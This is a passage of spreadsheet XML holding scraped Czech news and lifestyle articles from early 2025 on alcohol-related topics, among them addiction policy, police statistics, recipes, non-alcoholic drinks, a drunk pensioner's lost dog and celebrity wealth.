návykových látek policie eviduje odmítnutí podrobit se po nehodě testu: loni jich bylo 19. O tom, že střízlivost může pomoci zachraňovat životy, by ostatně mohl hovořit i další náměstek ředitele středočeské policie Ondřej Smotlacha, který má na starost kriminální policii. V přehledu registrované kriminality za rok 2024 ve středních Čechách figuruje 22 případů vražedného jednání, z toho deset mordů bylo dokonaných. V drtivé většině se podle Smotlachy jednalo o takzvané situační jednání: důsledky konfliktů, do nichž se jejich aktéři dostali zpravidla poté, co se opili. Pak se chopili nejčastěji nože, ale třeba popadli i šroubovák nebo baseballovou pálku. Autor: Milan Holakovský Autor Milan Holakovský</t>
  </si>
  <si>
    <t>39560</t>
  </si>
  <si>
    <t>39620</t>
  </si>
  <si>
    <t>20250201_114_3890184232_661b5d842ca52eb26b48.html</t>
  </si>
  <si>
    <t>661b5d842ca52eb26b48</t>
  </si>
  <si>
    <t>Stát při prevenci alkoholismu selhává, tvrdí adiktologové</t>
  </si>
  <si>
    <t>Stát při prevenci alkoholismu selhává, tvrdí adiktologové Alkoholu v Česku propadá stále více lidí. Riziková konzumace se týká až milionu a půl osob. Nejvíce ohroženi jsou obecně muži a věková kategorie 45 až 54 let. Odborníci se shodují , že pomoci by mohla prevence zejména na školách a větší dostupnost psychoterapeutických služeb. Stát ovšem v implementaci opatření selhává a nepomáhá ani místní pověstná lacinost alkoholu . ... Celý článek naleznete na: www.novinky.cz/... Autor: Lasty Webdesign Autor person Lasty Webdesign</t>
  </si>
  <si>
    <t>20250201_115_3889990592_e9262fd2a4cdfb573a4f.html</t>
  </si>
  <si>
    <t>e9262fd2a4cdfb573a4f</t>
  </si>
  <si>
    <t>Stát při prevenci alkoholismu selhává, tvrdí adiktologové Alkoholu v Česku propadá stále více lidí. Riziková konzumace se týká až milionu a půl osob. Nejvíce ohroženi jsou obecně muži a věková kategorie 45 až 54 let. Odborníci se shodují, že pomoci by mohla prevence zejména na školách a větší dostupnost psychoterapeutických služeb. Stát ovšem v implementaci opatření selhává a nepomáhá ani místní pověstná lacinost alkoholu . „Velká část české populace se nachází v rizikové kategorii pití alkoholu , mezi dospělými je to přibližně každý pátý. Nejnovější průzkumy ukazují, že nejvíce ohroženi jsou lidé ve věku 45 až 54, tedy skupina, která vyrůstala před rokem 1989,“ uvedl ve středu na tiskové konferenci Benjamin Petruželka z Kliniky adiktologie 1. lékařské fakulty UK a Všeobecné fakultní nemocnice ( VFN ). Jak upozornil, adiktologové zaznamenali snížení spotřeby alkoholu během covidové pandemie. Tento pokles však neměl dlouhého trvání a dnes se konzumace vyhoupla zpět na původní vysokou úroveň, a to u mužů i u žen. Každý den podle něj popíjí alkohol přes 19 procent mužů a skoro čtyři procenta žen. „Závislost na alkoholu je mezi diagnózami na adiktologických klinikách stále nejčastější u obou skupin,“ řekl. „Relativně pozitivní zprávou je, že u dětí a mládeže sledujeme klesání konzumace, které se však v poslední době zastavilo,“ dodal Petruželka. Aby se situace zlepšila, je podle odborníků nutné zaměřit se na preventivní opatření, která mají největší smysl právě u dětí. „Nejvyšší šanci změnit postoje a chování ve vztahu k návykovým látkám máme mezi jedenáctým a šestnáctým rokem. Proto se musíme na tuto kategorii zaměřit. Existují na to potřebné nástroje a programy, ale české školy je velmi málo používají a nejsou k tomu systémově příliš motivovány,“ popsal pro Novinky přednosta adiklotogické kliniky 1. lékařské fakulty UK a VFN Michal Miovský . Česku podle něj také výrazně chybí specializované ambulance, které sdružují odborné pracovníky z oblasti psychologie, psychiatrie, adiktologie i sociálních služeb. „Tento typ provozu, kde odborníci pečují o pacienta společně a který je zároveň nejvhodnější pro středně těžké případy, je nejvíce nedostatkový,“ vysvětlil. Krátkodobou a střednědobou terapii v odborných centrech by přitom podle odhadů potřeboval přibližně jeden a půl milionu lidí. Prevence se vyplatí desetkrát Vedoucí Expertního adiktologického centra VFN Roman Gabrhelík upozornil, že prevence je stále podceňovanou součástí systému. „Dnes už přitom víme, že prevence se desetinásobně vyplatí. Jedna koruna investovaná do prevence ušetří až deset korun na zdravotní péči, sociálních nákladech nebo související kriminalitě,“ uvedl. I přesto odborníci zásadní posun nevidí, ani postupné zvyšování spotřební daně na většinu alkoholických nápojů s výjimkou tichého vína podle nich nemá požadovaný efekt. „V Česku zásadní změny, ve smyslu, že by se daně na alkohol chytaly alespoň inflace nebo obecného zvyšování cen, nenastávají. Z hlediska konzumenta a toho, kolik toho může utratit, se daně spíš snižují. Přáli bychom si, aby se na tom něco změnilo,“ komentoval Gabrhelík . „Ani jednostranné zvyšování cen není řešení, protože opatření nemohou fungovat izolovaně. Na systému prevence přitom pracujeme už pětadvacet let, ale stát není schopný to vzít a implementovat do praxe v odpovídajícím rozsahu,“ zakončil Miovský. Denně konzumuje alkohol téměř pětina mužů. Ilustrační foto Autor: Marie Kuželová Autor person Marie Kuželová</t>
  </si>
  <si>
    <t>20250201_116_3891953787_78d1e26daee623316a22.html</t>
  </si>
  <si>
    <t>78d1e26daee623316a22</t>
  </si>
  <si>
    <t>Svačina do termosky</t>
  </si>
  <si>
    <t>Svačina do termosky Vydejte se ven i v zimě! Ať už si uděláte piknik na zahradě nebo vyšlápnete na túru do lesa, budete potřebovat zahřát a posilnit. Vanilkový sahleb Sahleb milují všechny děti. Na zimní procházce krásně zahřeje a na rozdíl od čaje navíc i zasytí a dodá energii. Do hrnku dám 3 lžíce kukuřičného škrobu, trošku mléka a rozmíchám na hladkou směs bez hrudek. Ohřeju půl litru mléka a před tím, než se začne vařit, přiliju škrobovou směs. Osladím, přidám semínka z vanilkového lusku a zvolna vařím asi 2 až 3 minuty. Sahleb by měl být o trochu řidší než pudink. Stáhnu z ohně a přidám pár kapek růžové vody (koupíte třeba v DM). Podávám posypané sekanými pistáciemi a skořicí nebo kokosem. Tip: Sahleb se originálně připravuje ze škrobu z kořene vstavače, horské orchideje, která má povzbuzující účinky. Seženete ho v prodejnách s orientálním zbožím. Foto: Kateřina Suchá „Sahleb je exotický, krásně voňavý a delikátní pudink, vonící po růžích. Pochází z turecké kuchyně a mě ho naučila moje bulharská babička. Díky, babi!“ Anna Černotová, redaktorka Cizrnačka s rajčaty Tahle polévka do termosky je plnohodnotné jídlo. Pečená rajčata a česnek vás zahřejí, cizrna zažene hlad a díky vysokému obsahu bílkovin vás i nastartuje, třeba ke zdolání pořádného kopce! Kilo rajčat rozkrojím na půlky, rozložím na plech, hustě posypu sušeným oreganem a zakápnu olivovým olejem. Přidám paličku česneku (vcelku) a peču 20 až 30 minut na 200 °C. Pečená rajčata lžící vyberu ze slupek a přendám do mixovací nádoby. Přidám vyloupaný pečený česnek a rozmixuju na pyré. V hrnci na olivovém oleji orestuji 1 až 2 na kolečka nakrájené pórky (jen bílou část). Zaliju 3 až 4 šálky kuřecího vývaru, přidám rajčatovo-česnekovou směs, dvě plechovky krájených loupaných rajčat a 2 až 3 hrnky uvařené cizrny (i sterilované). Osolím, případně i dosladím, prohřeju a přeliju do termosek. Tip: V zimě, když rajčata nemají tak silnou chuť, přidávám do polévky ještě pár lžic rajčatového protlaku. Foto: Kateřina Suchá „Možná jsem romantik, ale myslím, že my lidé bychom si neměli nechat ujít možnost rozdělat oheň. Potřebujeme ten kontakt s živlem.“ Jamie Oliver , šéfkuchař Slovenské hriatô Potřebujete naštípat hromadu dříví? Sežeňte si pár pomocníků a navařte hriatô – pálenku svařenou s karamelem. Do rendlíku dám tři lžíce cukru a zvolna zahřívám, až se rozpustí na karamel. Vliju dvě deci vody – karamel začne prskat a okamžitě ztvrdne, ale po chvíli míchání se zase úplně rozpustí. Pak přidám dvě deci ovocné pálenky a už nevařím, jen prohřeju a přeliju do termosky. Tradičně se hriatô pije s několika kousky čerstvě vyškvařené slaninky, která má po vhození do skleničky zasyčet. Tip: U našich příbuzných na Oravě dělají hriatô s vodkou. Přidávají jen asi deci až dvě vody na půllitr vodky a ještě šťávu ze dvou pomerančů. Alkohol v téhle verzi není tolik cítit, ale účinky se dostavují, tak opatrně! Foto: Kateřina Suchá VENKU I V MRAZU NEEXISTUJE ŠPATNÉ POČASÍ, JEN ŠPATNÉ OBLEČENÍ A VYBAVENÍ. TEPLO Rozdělejte oheň, pořiďte plynový teplomet a jednorázové hřející polštářky – prodávají se i jako vložky do bot! POHODLÍ Ideální jsou tři vrstvy oblečení: savé funkční prádlo z merina, hřejivý flís a větruodolný svršek. JÍDLO Pořádně zahřejí kořeněná jídla jako kari, poctivý vývar s masem, zázvor a kapka něčeho ostřejšího.</t>
  </si>
  <si>
    <t>20250201_117_3889989622_f72f6dcb1763436e8501.html</t>
  </si>
  <si>
    <t>f72f6dcb1763436e8501</t>
  </si>
  <si>
    <t>Miliardáři mezi celebritami: Spielbergův byznys, Jay-Z utápí peníze v alkoholu</t>
  </si>
  <si>
    <t>Miliardáři mezi celebritami: Spielbergův byznys, Jay-Z utápí peníze v alkoholu Jsou slavní, úspěšní a pohádkově bohatí. Majetek mnoha celebrit se však dávno nepočítá v milionech, ale v miliardách dolarů. Tady je „sedmička“ těch, kteří jsou už do konce života totálně „za vodou“. Okruh slavných, o nichž se ví, že patří mezi dolarové miliardáře, se rok od roku rozrůstá. Když byl v roce 1982 poprvé vyhlášen žebříček nejbohatších lidí Ameriky , dostaly se do něj jen dvě celebrity: hudebnice Oko Yono a herec Bob Hope . Stačilo jim na to jmění okolo 150 milionů dolarů. V následujících letech se přidalo dalších šest šťastných, jen tři z nich však byli miliardáři – režiséři George Lucas , Steven Spielberg a slavná moderátorka Oprah Winfreyová . Ti se drží na předních příčkách dodnes. Na paty jim však už šlape řada dalších celebrit, třeba basketbalová legenda Michael Jordan nebo rapper Jay-Z, kteří se už roky velmi úspěšně věnují i podnikání. Tučné zisky jim „přitékají“ hlavně z investic. Jednou z nejbohatších celebrit na světě je i Steven Spielberg . Připomeňte si s námi jeho film Čelisti, který mu vydělal spoustu peněz: | Video: Youtube Moderátorka z chudých poměrů Kapitál slavné moderátorky Oprah Winfreyové , která se narodila do poměrně chudé rodiny, dosahuje bezmála tří miliard dolarů. Proslavila se hlavně svou úspěšnou talk show, kterou během pětadvaceti let proměnila v mediální a obchodní impérium. Nikdy ale nezapomněla, z jakých poměrů vzešla, a pomáhá, kde se dá. Prostřednictvím své organizace věnovala více než 40 milionů dolarů na rozšíření zdravotní péče v zemích třetího světa. Pravidelně přispívá i na vzdělávání chudých dívek, které nemají ke studiu příznivé podmínky. Hodnota majetku: 2,8 mld. dolarů close info Zdroj: Profimedia zoom_in Oprah Winfreyová Miliardy za Čelisti a Jurský park Obrovskými příjmy se může pochlubit i opěvovaný režisér Steven Spielberg , který je zároveň hrdým spoluzakladatelem produkční společnosti Dream Works. Celosvětově jeho filmy vydělaly více než 10 miliard dolarů, část peněz z každé prodané vstupenky do zábavních parků Universal jde navíc Spielbergovi přímo do kapsy. Tvůrce snímků Čelisti, Jurský park nebo E. T. Mimozemšťan dnes disponuje majetkem, který se šplhá skoro k pěti miliardám dolarů. Hodnota majetku: 4,8 mld. dolarů Společnost Režisér, filantrop a marketingový génius Jméno George Lucas je ve světě skutečným pojmem. Scenárista, režisér a producent takových kasovních trháků, jako je sága Star Wars (Hvězdné války) nebo filmy o Indianu Jonesovi , má dnes na kontě téměř šest miliard dolarů. Značnou část těchto peněz mu v roce 2012 přinesl prodej společnosti Lucasfilm studiím Walta Disneyho . Nyní se zaměřuje hlavně na filantropii. Hodnota majetku: 5,7 mld. dolarů Investuje do alkoholu a umění Mnohonásobný držitel prestižní ceny Grammy, americký rapper Jay-Z, se rozhodně nespoléhá jen na příjmy z hudebního odvětví. Založil značku hiphopového oblečení Rocawear, kterou s velkým ziskem prodal. Investuje i do alkoholu , luxusních nemovitostí či nesmírně cenných výtvarných děl. Během pěti let svůj majetek více než zdvojnásobil, aktuálně má ušetřeno asi 2 a půl miliardy dolarů. A obchoduje dál! Vzhledem ke kauze, týkající se P. Diddyho , do které je zapleten, je otázkou, jak dlouho ještě… Hodnota majetku: 2,5 mld. dolarů Společnost Boháč z Pána prstenů Režisér Peter Jackson , který stojí za veleúspěšnými sériemi Pán prstenů a Hobit, vydělal na svých filmech ohromné jmění. Deseticifernou částku však překonal až v roce 2021, kdy jeho společnost Weta Digital , která se zabývá vizuálními efekty, prodala část svého majetku výrobci her Unity Software. Jackson tak vyinkasoval bezmála 600 milionů dolarů v hotovosti a 375 milionů dolarů v akciích k tomu. Hodnota majetku: 1,5 mld. dolarů Vydělává na kráse Nezpívá, nehraje ani nerežíruje. Přesto se profesionální celebrita Kim Kardashianová řadí k nejbohatším lidem v showbyznysu. Její čisté jmění rok od roku roste, v současnosti činí asi 1,7 miliardy dolarů. Přispěly k tomu zejména její dvě firmy – SKKN By Kim zaměřená na kosmetiku a SKIMS na oblast spodního a tvarujícího prádla. close info Zdroj: Profimedia zoom_in Kim Kardashianová Spoustu peněz ji nicméně stál rozvod s hudebníkem Kanyem Westem , kterému údajně zaplatila 23 milionů dolarů, aby si mohla ponechat sídlo Hidden Hills navržené Axelem Vervoordtem. Hodnota majetku: 1,7 mld. dolarů Zisky na hřišti i mimo ně Jeden z nejlepších hráčů NBA Michael Jordan se stal vůbec prvním sportovcem s miliardovým majetkem. Během aktivní kariéry si přišel na 90 milionů dolarů, mnohem víc si však vydělal mimo hřiště. Jen za partnerství s Nike , Hanes a Gatorade vyinkasoval více než dvě miliardy dolarů a příjmy mu „tečou“ i z investic a prodejů. Na své si ovšem přišla i jeho bývalá žena Juanita, která se s basketbalovou legendou rozvedla v roce 2006. Úřednice si v rámci vyrovnání odnesla 150 milionů dolarů. Hodnota majetku: 3,2 mld. dolarů Nahrává se anketa ... Autor: Michaela Míčová Autor person Michaela Míčová</t>
  </si>
  <si>
    <t>817630</t>
  </si>
  <si>
    <t>20250201_118_3889960216_bb0106b9b263744d3e13.html</t>
  </si>
  <si>
    <t>bb0106b9b263744d3e13</t>
  </si>
  <si>
    <t>Databáze hodnocení vín z Moravy a Čech. Inspirujte se. Lukáš Polívka: Vinaři i zákazníci se vracejí k tradičním odrůdám Rozhovory , 7. 2. 2025 Vinařství Lukáše Polívky z Velkých Němčic patří stále ještě spíše k těm méně známým. Viditelné úspěchy na prestižních vinařských soutěžích a výrazná snaha vinaře prezentovat se na množství vinařských akcí ale už přináší ovoce. V rozhovoru jsme se dotkli i historie, ale především specifik vinařství související s jeho sídlem a sortimentem. číst více Recenze a testy vín , 4. 2. 2025 Trendem posledních let sice je konzumace vín s nižším obsahem alkoholu , stálé oteplování jde ale fyziologií révy vinné proti tomuto proudu. A kdy jindy by měl být ideální čas pro vína s vyšším alkoholem než právě v zimním období...? Představujeme tedy tři vína tří moravských podoblastí s minimálním obsahem alkoholu 13,5 % a pochvalnými recenzemi z minulého týdne. číst více Novinky z Lahvotéky , 1. 2. 2025 Vinařská obec Nový Šaldorf-Sedlešovice na jižním okraji Znojma je už mezi vínomilci dosti známá a překypuje množstvím vinařství. Mezi ta nejzajímavější se v posledních letech prodírá Vinařství Milbach. Jeho vína zejména ve vyšší řadě Exclusive by neměla zůstat mimo radar vínomilců. číst více Recenze a testy vín , 29. 1. 2025 Jednu dobu platilo Rulandské bílé za opomíjenou odrůdu, kterou dokáže ocenit jen poučenější publikum. Tento punc exkluzivity a také různé postupy vinifikace – například použití sudů či jejich alternativ, ponechání vyšších zbytkových cukrů apod. – vybudily opětovný zájem o tuto odrůdu. Dnešní trojice vín z ročníku 2023 by měla vyhovovat širokému publiku. číst více Novinky z Lahvotéky , 26. 1. 2025 ( 4 komentáře ) Moravíno už dávno není jen „vstupním vinařstvím“ pro začínající vínomilce. Svou kvalitu prokazuje napříč ročníky a odrůdami, a i když i vína základní řady patřila mezi špičku tuzemské produkce, před třemi lety se objevila ta nejlepší v nové řadě Burgunder. číst více Zimní otevřené sklepy Nový Šaldorf 2025: Příhodná akce na začátek roku Reportáže , 24. 1. 2025 Od roku 2020, kdy jsme lednové otevřené sklepy v Novém Šaldorfu navštívili poprvé, se stala tato akce první svého druhu, na kterou v daný kalendářní rok jezdíme. Organizace prošla už několika zásadními změnami, bohužel zachován zůstal princip placených vzorků. I proto je akce vhodnější spíše k cílenému prozkoumání některých vinařství a užití si atmosféry zimních sklepů. číst více Autor: MojeLahve.cz</t>
  </si>
  <si>
    <t>20250201_119_3889973660_b2f9dab0e3f74b82b284.html</t>
  </si>
  <si>
    <t>b2f9dab0e3f74b82b284</t>
  </si>
  <si>
    <t>Nezůstávejte v únoru na suchu. Skvělé drinky si vychutnáte i bez alkoholu</t>
  </si>
  <si>
    <t>Nezůstávejte v únoru na suchu. Skvělé drinky si vychutnáte i bez alkoholu Kampaň Suchej únor vyzývá od roku 2013 k měsíci bez alkoholu a celkově k zamyšlení nad svými návyky. Ve výsledku tak můžete přehodnotit nejen svůj vtah k alkoholu , ale i jiné oblasti života. Pokud si dáte sem tam skleničku, asi pro vás nebude tak velký problém, vzdát se alespoň na měsíc alkoholu zcela, je-li v popíjení ale již určitá pravidelnost, tak snadné to být nemusí. Abstinence přitom přináší celou řadu benefitů pro naše zdraví, například budete lépe spát a mít více energie, pozitivně se to promítne na pleti či hmotnosti, a takto bychom mohli pokračovat. Možná se pro vás stala sklenka vína či pivo s přáteli určitým rituálem, v tom případě je dobrou zprávou, že se jej nemusíte vzdávat. Na trhu naleznete již nealkoholická vína , giny, aperitivy či piva (a to i na čepu), která výborně chutnají a alkohol vám tak chybět nebude. Odklon od alkoholu může být zároveň příležitostí také k pozvání nových chutí v drincích , které byste jinak ani nezkusili. Některé jsou jednoduše chutné, jiné zároveň prospějí organismu (například matcha, kokosová voda, kombucha, skořicový čaj apod.). Zde je alespoň malá inspirace, jak si zpestřit nejen suchý únor. Drink s melounem a mátou Ingredience 3 šálky vody a další na podávání 1/4 lžičky mořské soli 1 šálek medu 6 šálků nahrubo nakrájeného melounu 1 šálek čerstvé máty 1 šálek jablečného octa Kostky ledu Nakrájený meloun, nakrájená okurka a máta na ozdobu Foto: Shutterstock Postup V hrnci přiveďte k varu 3 šálky vody a sůl, přidejte med, zamíchejte, aby se rozpustil, a odstavte. Ve velké míse smíchejte meloun a mátu. Vmíchejte med a vodu a nechte vychladnout na pokojovou teplotu, poté přidejte ocet. Směs nechte několik hodin, nebo až přes noc odležet v chladničce. Směs sceďte a v případě potřeby kousky melounu vyjměte a snězte. Koncentrát přelijte do čisté skleněné nádoby a uchovávejte v chladničce, vydrží až 1 týden. Pro podávání nalijte 1/4 šálku koncentrátu do sklenice na led a zřeďte 3/4 šálku vody (zkusit můžete i tonik). Ozdobte melounem, okurkou a mátou. Nealko irský likér Ingredience 150 ml hutné smetany 50 ml neslazeného kondenzovaného mléka 2 lžíce javorového sirupu 25 ml čerstvě uvařeného espressa špetka mleté skořice 1 lžička vanilkového extraktu špetka jemně nastrouhané pomerančové kůry led Foto: Shutterstock Postup Všechny ingredience dejte do velkého koktejlového šejkru nebo džbánu s pořádnou dávkou ledu. Pokud používáte šejkr, dobře protřepejte, dokud nebude vnější strana studená, a poté dvakrát přeceďte do sklenic. Pokud používáte džbán, dobře promíchejte, dokud se nespojí. Podávejte přelité ledem. Mocktail bílá sangria Ingredience 1 láhev nealkoholického bílého vína nebo hroznové šťávy 1 šálek jablečného moštu ¼ šálku citronové šťávy 1 nakrájené jablko 1 nakrájený krvavý pomeranč (nebo obyčejný pomeranč) 3 tyčinky skořice (plus další na ozdobu) 2 badyány (plus další na ozdobu) Trocha javorového sirupu na doslazení Foto: Shutterstock Postup Víno (nebo jeho alternativu), jablečný mošt, citronovou šťávu, ovoce a koření vložte do džbánu a dejte do chladničky, kde se bude alespoň hodinu louhovat. Těsně před podáváním ochutnejte a pokud máte raději sladší, přidejte lžíci javorového sirupu. Promíchejte a znovu ochutnejte. Postup opakujte, dokud nebude taková, jakou ji máte rádi. Naplňte sklenici ledem, přidejte další ovoce a koření a podávejte. Zdroj: Wikipedia Commons, food52.com, bbcgoodfood.com, mindfulmocktail.com Foto: Shutterstock Tagy: inspirace nápoje Autor: Kristýna Solničková Autor person Kristýna Solničková</t>
  </si>
  <si>
    <t>20250201_12_3892195024_8fe8621bbd7fec96658f.html</t>
  </si>
  <si>
    <t>8fe8621bbd7fec96658f</t>
  </si>
  <si>
    <t>Slepá degustace českých IPA v BeerGeek Pivotéce</t>
  </si>
  <si>
    <t>Slepá degustace českých IPA v BeerGeek Pivotéce 28.2.2025 mapa není k dispozici Datum / čas Date(s) - 28.02.2025 18:00 - 22:00 Místo konání BeerGeek Pivotéka Kategorie Přinášíme vám jedinečnou příležitost být součástí slepé pivní degustace českých IPA. Je to jedinečná příležitost ochutnat pivo , spoléhajíc se pouze na své chuťové vjemy, bez vlivu informací o původu piva . Ochutnávka bude trvat hodinu a půl, během které ochutnáte 7 druhů piva . Perfektní jak pro zkušené milovníky tohoto stylu, tak i pro začátečníky, kteří se teprve seznamují. Voucher může být také skvělým dárkem. Degustací Vás bude provázet náš zkušený sommeliér a bude probíhat na poboččce na Karlíně , Křižíkova 97, 186 00 dne 28.2 v 18:00. Aktuality: Šestajovický pivovar Z důvodu výměny sládků v současnosti nemá žádné vlastní pivo na čepu ani v láhvi. Nové pivo teprve zraje. on 09/02/2025 Rychtik Velké Bílovice NoLimit - nealkoholické pivo . Spojuje tradiční pivní základ s jemnými tóny čínských čajových lístků Yuann Green Superior. on 09/02/2025 Albrechtický pivovar Kolečko - nealkoholická IPA, on 09/02/2025 Pivovarský dům Poupě Session IPA 12. Pro chmelení byla použita americká chmelová odrůda Simcoe. Výsledná chuť je příjemně ovocná, mírně zemitá s borovicovými a pryskyřičnými tóny. on 09/02/2025 Pivovar Uhříněves Praha</t>
  </si>
  <si>
    <t>358</t>
  </si>
  <si>
    <t>20250201_120_3889908638_368a0a9a4581260e7447.html</t>
  </si>
  <si>
    <t>368a0a9a4581260e7447</t>
  </si>
  <si>
    <t>Trable opilé důchodkyně: Domů netrefila, ztratila psa i tašku</t>
  </si>
  <si>
    <t>Trable opilé důchodkyně: Domů netrefila, ztratila psa i tašku Opilá důchodkyně z Mariánských Lázní dojela místo domů do Pardubic , cestou ztratila psa. (Autor: Městská policie Pardubice ) Autor: sgr - 11:15 Cesta vlakem se pro 65letou ženu z Mariánských Lázní změnila v pořádný zmatek. Po výletu do Prahy si dopřála více alkoholu , než bylo zdrávo, a místo domů dojela až do Pardubic . K tomu navíc ztratila svého jezevčíka Žofku i osobní tašku. Podivného chování seniorky si na pardubickém hlavním nádraží všimla ostraha a přivolala městskou policii. „Ještě v Pardubicích jí chvíli po páté hodině odpoledne strážníci naměřili 2,52 promile alkoholu v dechu. A aby toho nebylo málo, žena uvedla, že cestou ztratila i svou jezevčici Žofku a tašku,“ uvedl mluvčí pardubické městské policie Jiří Sejkora . Strážníci se obrátili na své kolegy z pražské městské policie a ti měli dobré zprávy. V Praze byla jezevčice Žofka nalezena a převezena do útulku. Zatímco čtyřnohá parťačka čekala na svou paničku v bezpečí útulku, její majitelka si musela odpočinout na záchytné stanici v Pardubicích . Po vystřízlivění dostala informace o tom, kde si může svého ztraceného mazlíčka vyzvednout. Podle informací z pražské městské policie došlo nakonec k šťastnému shledání ženy se svou jezevčicí. Celá situace tak skončila bez vážnější újmy, i když důchodkyně si z výletu pravděpodobně odnesla poučení o tom, jak snadno může alkohol zkomplikovat cestování. Video Opilý muž v Hradci Králové si ustlal v kontejneru. Budili ho strážníci. - Městská policie Hradec Králové Video se připravuje... Holka modrooká ( 2. února 2025 15:51 ) No, neee, už jsi fuč? 😂😂 To nevadí, ještě máš 11 nicků 😂😂😂 Holka modrooká ( 2. února 2025 13:10 ) Utíkej do kredence pro 💊💊💊💊, už je nejvyšší čas 😂😂 Holka modrooká ( 2. února 2025 13:08 ) Pěkně jsi se popsala 👍🏻😂😂😂 Holka modrooká ( 1. února 2025 22:39 ) 😂😂😂😂 Uživatel_5905896 ( 1. února 2025 15:49 ) V ČR máte rentiérov? Leda tak v budúcnosti Fialu, ktorý celý život žije z daní občanov a nikdy si nedokázal zarobiť prácou... Video se připravuje... Autor: sgr Autor person sgr Rubrika transition_slide Krimi</t>
  </si>
  <si>
    <t>1130000</t>
  </si>
  <si>
    <t>20250201_121_3899792185_729ea3709a7b2828bd3e.html</t>
  </si>
  <si>
    <t>729ea3709a7b2828bd3e</t>
  </si>
  <si>
    <t>Detox nemusí nutně znamenat zákaz, ale správnou volbu alkoholu</t>
  </si>
  <si>
    <t>Shrnutí Detox nemusí nutně znamenat zákaz, ale správnou volbu alkoholu Ilustrační snímek • Zdroj: Shutterstock Praha , 28. ledna 2025: První měsíce nového roku bývají plná odhodlání k novým začátkům. Pro mnohé to znamená odlehčení jídelníčku, zvýšení pohybové aktivity nebo snížení spotřeby alkoholu . Detox ovšem nemusí být synonymem pro striktní omezení. Naopak – jde o vyváženost. A kvalitní víno , zejména s nižším obsahem alkoholu , může být skvělou součástí vašeho zdravého restartu. „Na detoxikační období doporučuji zvolit vína , která obsahují méně než 12 % alkoholu a mají přirozený, nekomplikovaný charakter,“ říká MUDr. Pavel Kosík, vinař a praktický lékař z jižní Moravy . Pokud si tedy neumíte představit svůj nový start bez skleničky vína , není třeba si nic vyčítat. Stačí dodržet několik jednoduchých zásad, které vám umožní užít si kvalitní víno i během detoxikačního období. Proč právě víno může být součástí detoxu? Kvalitní víno v přiměřeném množství obsahuje přírodní antioxidanty, jako jsou polyfenoly a resveratrol, které mohou mít pozitivní účinky na organismus. Tyto látky přispívají k ochraně cév a snižování hladiny „špatného“ cholesterolu. „Sklenka vína denně může snížit riziko infarktu myokardu u některých lidí,“ vysvětluje Pavel Kosík. Bílá vína jsou zase ideální pro svou lehkost a svěží chuť, která perfektně doplní odlehčený jídelníček. Při výběru je vhodné zaměřit se na vína označená vlaječkou Vína z Moravy , vína z Čech . Tato označení garantují původ a kvalitu, díky čemuž si můžete být jisti, že vybíráte to nejlepší z domácí produkce. Tipy na vhodná vína , která podpoří váš zdravý start do nového roku Co dodržet při konzumaci vína během detoxu Začněte nový rok lehce a stylově. Vyberte si vína , která nejen chutnají, ale také podporují váš zdravý životní styl a jsou vhodná pro detoxitaci těla i duše. Autor: 1. února 2025 | · | 14:00 || red || red | 1. února 2025 | · | 14:00</t>
  </si>
  <si>
    <t>20250201_122_3889889078_b8b1bdeb6b1ecc1ec81b.html</t>
  </si>
  <si>
    <t>b8b1bdeb6b1ecc1ec81b</t>
  </si>
  <si>
    <t>Kanada by měla uvalit cla na Teslu, míní kandidátka na tamní premiérku</t>
  </si>
  <si>
    <t>Kanada by měla uvalit cla na Teslu , míní kandidátka na tamní premiérku Kanada by měla na případná americká cla reagovat zavedením obrovských dovozních poplatků na elektromobily Tesla . Podle serveru listu Financial Times to prohlásila bývalá kanadská ministryně financí Chrystia Freeland, která je kandidátkou vládních liberálů na premiérku v nadcházejících volbách. Ottawa by tak podle ní potrestala šéfa Tesly Elona Muska, kterého označila za „miliardářského kamarádíčka“ amerického prezidenta Donalda Trumpa . Musk, který je nejbohatším člověkem světa, nyní v USA vede nový úřad pro efektivitu státní správy. Trump podle mluvčí Bílého domu v sobotu uvalí 25procentní cla na dovoz z Kanady a Mexika a desetiprocentní clo na dovoz z Číny . Cla jsou podle mluvčí prezidentovy administrativy reakcí na to, že se přes Kanadu a Mexiko do USA dostává droga fentanyl. „Kanada musí pohrozit uvalením stoprocentního cla na všechna vozidla Tesla a stoprocentního cla na americké víno , pivo a lihoviny, pokud budou na Kanaďany uvalena nespravedlivá cla,“ řekla v pátek Freeland. Komentáře „jedné z nejvýznamnějších kanadských političek“ podle Financial Times ukazují na prudkou eskalaci obchodního sporu s Washingtonem . Kanadský premiér Justin Trudeau v pátek prohlásil, že jeho země je připravena reagovat, pokud Trump cla zavede. Dodal, že reakce bude rázná, ale rozumná. Varoval, že cla budou mít negativní dopady na Američany, protože ohrozí pracovní místa a způsobí růst cen. Trump hrozil zaváděním cel už v předvolební kampani, mimo jiné i kvůli migrantům bez dokladů, kteří se do USA dostávají zejména přes jižní hranici. Řada ekonomů varovala, že nová cla povedou k růstu inflace v USA . Vládní Liberální strana, z níž pochází Trudeau i Freeland, aktuálně v průzkumech veřejného mínění výrazně zaostává za konzervativci a očekává se, že po volbách, které se mají uskutečnit nejpozději v říjnu, půjde do opozice. Autor: ČTK Autor ČTK</t>
  </si>
  <si>
    <t>42210</t>
  </si>
  <si>
    <t>20250201_123_3889857590_4878ba1bca6287b94f3b.html</t>
  </si>
  <si>
    <t>4878ba1bca6287b94f3b</t>
  </si>
  <si>
    <t>Toto byl první Čech, který získal Oscara. Obdivoval ho celý svět, včetně Bardotové. Proč ho neznáte?</t>
  </si>
  <si>
    <t>Toto byl první Čech, který získal Oscara. Obdivoval ho celý svět, včetně Bardotové . Proč ho neznáte? info 5 fotografií Jako desetiletý chlapec získal to, o čem většina herců jen sní – Oscara a Zlatý glóbus. Přesto skončil nedoceněný a své zklamání utápěl v alkoholu . Co se stalo s tímto českým hereckým zázrakem? A proč jste o něm možná nikdy neslyšeli? Byl to zářivý talent a první Čech oceněný Oscarem. Přesto zemřel osamělý a zapomenutý ve svém bytě. Příběh Ivana Jandla je svědectvím o tom, jak totalitní režim dokázal zničit nadějnou kariéru. Zázračné dítě s handicapem „Byl mimořádně talentovaný a přirozený,“ vzpomínal americký režisér Fred Zinnemann na první setkání s mladičným Ivanem . Málokdo by tehdy řekl, že tento drobný chlapec překonal obrnu. „Lékaři mu předpovídali invaliditu, ale díky péči doktora Příbramského z Thomayerovy nemocnice se z nejhoršího dostal,“ vyprávěli jeho blízcí. Zůstalo mu jen lehké kulhání. Navzdory svému handicapu hrál fotbal za Čechii Karlín, chodil na klavír a vynikal ve školním divadle. Jeho talent neunikl pozornosti učitele Pospíšila, který ho přihlásil do prestižního Dismanova rozhlasového souboru. Osudové setkání s Hollywoodem „O 